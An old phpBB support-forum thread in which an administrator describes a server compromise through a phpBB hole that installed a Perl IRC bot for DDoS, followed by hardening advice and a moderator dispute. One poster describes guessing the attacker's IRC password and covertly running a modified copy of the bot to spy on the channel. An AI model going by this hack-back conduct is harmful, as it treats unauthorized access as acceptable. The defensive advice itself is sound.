Forum Hack Story

The 2.0.x discussion forum has been locked; this will remain read-only. The 3.0.x discussion forum has been renamed phpBB Discussion.
SQLBoy
Registered User
Posts: 5
Joined: Mon Dec 06, 2004 2:29 am

Forum Hack Story

Post by SQLBoy »

So, recenltly I was away on a weekend trip to NY and when I came back, a customer of mine had his machine hacked into through phpBB.

The guy uploads a perl script which is an IRC bot script and it connects to a channel under the cracker's control. From that point, he can execute arbitrary shell commands though a private conversion with the bot. The perl script disguises itself as an apache process. I actually learned a good amount of technique of this guy's perl code.

Unfortunately, I didn't have a decent outbound firewall on the machine and the script was able to get out, nor did I have any intrusion detection software running.

I connected to the channel the bot connects to with XChat and the guy had like 100 Linux zombies in there, all of them he got through the phpBB hack. I talked to him for a while using babelfish because he doesn't speak english. He was using them for massive DDOS attacks. I whoised them all and got the IP address and emailed their ISP or hosting provider. So far I only got two responses and the list of zombies entering the channel is getting ridiculous. The guy booted me and passworded it but I did some research on him and I was able to guess his password (1st try)

Anyway, I have always considered phpBB to be the biggest weak leak on any web server. Even if you keep your PHP and Apache versions totally up to date, something like this could always happen. So, my advice to anyone running phpBB, to get a little added protection:

Add the LIDS kernel patches
http://www.lids.org/

Use a stateful outbound firewall that doesn't allow programs to initiate a connection from the machine. For example:

Code: Select all

iptabes -A OUTPUT -p ALL -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT
Will only allow packets that are part of an existing/established TCP session to leave your box. Then you can poke small holes in to allow mail transport, DNS,etc.

If anyone else has any added tips that would have rendered the hole in PHPBB useless to a cracker, please post them.
Magnotta
Former Team Member
Posts: 1093
Joined: Fri Oct 17, 2003 4:16 am
Location: Ontario

Post by Magnotta »

The best thing to do with phpBB as far as security goes is always keep up to date and use the newest version.
sonyboy
Registered User
Posts: 2980
Joined: Thu Oct 07, 2004 2:10 am

Post by sonyboy »

interesting story
Locksmiff
Registered User
Posts: 104
Joined: Sat Nov 20, 2004 5:51 am

Re: Forum Hack Story

Post by Locksmiff »

SQLBoy wrote: If anyone else has any added tips that would have rendered the hole in PHPBB useless to a cracker, please post them.
I have a shit load. They are easier to impliment then explain, so leave it with me and I will do a draft up. To many cooks spoil the broth is one.
The internet is in the hands of idiots......
Locksmiff
Registered User
Posts: 104
Joined: Sat Nov 20, 2004 5:51 am

Post by Locksmiff »

Magnotta wrote: The best thing to do with phpBB as far as security goes is always keep up to date and use the newest version.
Yeah ok how does that work pre 2.11 :lol: just joking off course.
The internet is in the hands of idiots......
User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

1. Keep phpBB up-to-date.
2. You can make use of mod_security.
3. You can make use of IDS'es and IPS'es on your network and on your server.
4. Make sure appropriate rights are assigned to the appropriate people.
5. Harden your filesystem, whatever OS you are using.
6. Keep phpBB up-to-date.
7. Keep everything on your server up-to-date.
8. Regularly scan your server for running backdoors and such.
9. Actively monitor your site.
10. Harden your OS, whatever OS you are using.

Just a small list. And yes, I know I said keep phpBB up-to-date more than once. However, I cannot stress this enough. People with MODs, update to 2.0.11 anyway. You can always reinstall them.
Proven Offensive Security Expertise. OSCP - GXPN
bzchi
Registered User
Posts: 8
Joined: Sun Oct 31, 2004 3:11 am
Location: Australia

Post by bzchi »

Because this isn't a backdoor as such, you will no doubt get nagetive responses from scanners but still have code sitting in /tmp.

What _can_ be done
Obviously upgrade to the latest version, but for exploits of this nature you can follow several steps to secure the area that the scripts/exploits target.

The critical thing to do to avoid this exploit causing any problems to your system is to secure /tmp, /usr/tmp. Make sure /tmp is mounted with noexec, nosuid so even if people manage to exploit phpBB (or another script for that matter) and upload files, they won't be able to execute them. To confirm you have /tmp mounted with noexec,nosuid type 'mount' and it will be listed to the right of the mounted partition.

Another thing to make note of is (the iptables rule in the original post), even if you set OUTPUT rules on your firewall there are many services that still need to initiate connections and get out. For example RHN uses port 80 and 443 to access updates (up2date etc). CPanel, WHM, Plesk etc all use updates off the net. You do require some output rules to so local services can access out, but it is best to keep these to a restricted list of known hosts (RHN mirrors etc). This also applies to other package managers such as APT in Debian. So although it looks 'ultra secure' setting only established and related packets back out.. you may run yourself into a bigger problem with scheduled security updates failing because they can't contact update servers, just be careful.

mod_security would be good, and restrict the use of wget being passed in the URL (this will stop a fair amount of attempts). This is made redundant by securing /tmp but it is an extra layer.

I monitor this forum daily for updates and one of my dev boxes was still hit before I managed to update (matter of hours after 2.0.11 was out). I believe word of this exploit was about for a fair time before phpBB broke news of it but the response from phpBB once informed was highly commendable.


For the original poster:
Was the server undernet and the channel something to do with FBI? I have heard 3 or 4 stories in the last 24 hours of people being hit with what you describe. All a result of a stale install of phpBB. Looks like a group is basically scanning hosts for old versions phpBB.
SQLBoy
Registered User
Posts: 5
Joined: Mon Dec 06, 2004 2:29 am

Post by SQLBoy »

No, it is another IRC server. I don't want to post the details on here because I have modified their perl script to monitor the channel for me. It still respond to most of the bot commands they have so they have not caught on that I'm actually an intruder. When I have time, I get all the IP addreses of the other bots and start doing whois's n stuff, emailing the people I think might be in charge of the machine. The list is growing massive though. When these guys level a DDOS on someone its over 100mbps of traffic.

Mouting /tmp no-exec is a great. I didn't know you could do that. Gentoo users should also not /var/tmp and /dev/shm have the same permissions as /tmp and are also vulnerable.
User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

Techie-Micheal wrote: 1. Keep phpBB up-to-date.
2. You can make use of mod_security.
3. You can make use of IDS'es and IPS'es on your network and on your server.
4. Make sure appropriate rights are assigned to the appropriate people.
5. Harden your filesystem, whatever OS you are using.
6. Keep phpBB up-to-date.
7. Keep everything on your server up-to-date.
8. Regularly scan your server for running backdoors and such.
9. Actively monitor your site.
10. Harden your OS, whatever OS you are using.

Just a small list. And yes, I know I said keep phpBB up-to-date more than once. However, I cannot stress this enough. People with MODs, update to 2.0.11 anyway. You can always reinstall them.
/me whistles non-chalantly ...
Proven Offensive Security Expertise. OSCP - GXPN
User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

bzchi wrote: Because this isn't a backdoor as such, you will no doubt get nagetive responses from scanners but still have code sitting in /tmp.
The one backdoor that I saw in /tmp from a user was listening on a TCP port, so yeah, a scan would have picked it up. ;)
Proven Offensive Security Expertise. OSCP - GXPN
bzchi
Registered User
Posts: 8
Joined: Sun Oct 31, 2004 3:11 am
Location: Australia

Post by bzchi »

Techie-Micheal wrote:
bzchi wrote:Because this isn't a backdoor as such, you will no doubt get nagetive responses from scanners but still have code sitting in /tmp.
The one backdoor that I saw in /tmp from a user was listening on a TCP port, so yeah, a scan would have picked it up. ;)


I respect your position as a moderator but I believe this post was added purely to attempt to discredit my claims that some attacks may go unnoticed by IDS on the grounds that you have seen a single incident that was detectable?

I think this can be potentially misleading, in the instance you speak about maybe they were lucky that a port was opened? instances still occur where some IDS's don't pick this kind of attack/intrusion up. Not all people install a backdoor/trojan when exploiting this hole. Infact I have cleaned up a server than just uploaded multiple instances of SH to execute commands one by one, no running services and local scanning didn't pick it up. On top of that different people run different IDS's and not all of them are as infallible as you suggest yours is.
User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

bzchi wrote:
Techie-Micheal wrote:
bzchi wrote:Because this isn't a backdoor as such, you will no doubt get nagetive responses from scanners but still have code sitting in /tmp.
The one backdoor that I saw in /tmp from a user was listening on a TCP port, so yeah, a scan would have picked it up. ;)


Well thats good for him,
I guess I deserved that one. :P
instances still occur where some IDS's don't pick this kind of attack/intrusion up.
I know this ... However, IDS'es shouldn't be the only thing in your toolbelt, which is what I was getting at.
Not all people install a backdoor/trojan when exploiting this hole. Infact I have cleaned up a server than just uploaded multiple instances of SH to execute commands one by one, no running services and local scanning didn't pick it up.
I know this too ... However, it should be a simply rule to write to detect the exploit. Heck, I've even put a change in my phpBB to give attackers a nasty little message when they try to exploit the hole.
It's all well and good to post up 'best practice' or 'do this do that' but it really isn't helping those affected which I think this thread should aim at..
Same goes for your own post. ;)
may I also point out that your first step 'keep phpBB up to date' would not have necessarily helped in this instance as the exploit was out and servers were being affected before the update was released.
That is true, and why I hate 0day, but 99% of the time, and in fact I'd even wager almost 100% of those attacked would have been safe if they just updated to 2.0.11.
Now suggesting a better IDS etc, thats great.. I can chant about server security all day too.. but I think helping people with advice is of more benefit than surveying the scene with 20/20.
Not just better IDS'es, but better handling. Making sure you are up-to-date on your software, not just in terms of running the patches, but making sure you understand what it is you are running. And if people don't have access to properly protect their server (I'm guessing the majority of our users are free/shared hosting users), they need to contact their webhost to make sure the proper measures are in place. Proper measures are not just monitoring your IDS, but making sure your host and you understand what it is that happened, be it a defacement, a virus went crazy on the server, or a harddrive failed.
Proven Offensive Security Expertise. OSCP - GXPN
User avatar
Techie-Micheal
Security Consultant
Posts: 19511
Joined: Sun Oct 14, 2001 12:11 am
Location: In your servers

Post by Techie-Micheal »

bzchi wrote:
Techie-Micheal wrote:
bzchi wrote:Because this isn't a backdoor as such, you will no doubt get nagetive responses from scanners but still have code sitting in /tmp.
The one backdoor that I saw in /tmp from a user was listening on a TCP port, so yeah, a scan would have picked it up. ;)


I respect your position as a moderator but I believe this post was added purely to attempt to discredit my claims that some attacks may go unnoticed by IDS on the grounds that you have seen a single incident that was detectable?

I think this can be potentially misleading, in the instance you speak about maybe they were lucky that a port was opened? instances still occur where some IDS's don't pick this kind of attack/intrusion up. Not all people install a backdoor/trojan when exploiting this hole. Infact I have cleaned up a server than just uploaded multiple instances of SH to execute commands one by one, no running services and local scanning didn't pick it up. On top of that different people run different IDS's and not all of them are as infallible as you suggest yours is.
I really do not appreciate your editing your post. Especially in such an attacking manner ... Read my post above, it explains all ... Now, you can either chill out, and we can carry on this conversation like two grown adults, or I can get out my big stick. Your choice.
Proven Offensive Security Expertise. OSCP - GXPN
User avatar
Draegonis
Former Team Member
Posts: 3950
Joined: Mon Apr 22, 2002 3:12 pm
Location: Kµlt øƒ Ø
Contact:

Post by Draegonis »

Oofay, nice nija edit. Shame you changed it to effective slander. You've made 3 posts here and you're already challenging the staff. Tone it down a bit, eh?
bzchi
Registered User
Posts: 8
Joined: Sun Oct 31, 2004 3:11 am
Location: Australia

Post by bzchi »

My apologies for the post, I attempted to remove it but unfortunately it had already been responded to.

I didn't want a personal attack, but I believe it is easy to take the high ground and I just want to get across that if someone has an IDS it doesnt make them safe.

Thats all I want to get across, im not attempting to upset anyone or put them offside,nor was it a 'ninja post' I believe your points are more than valid Techie-Michael I just think they can be read as "if you have this, you are safe".
Locked

Return to “2.0.x Discussion”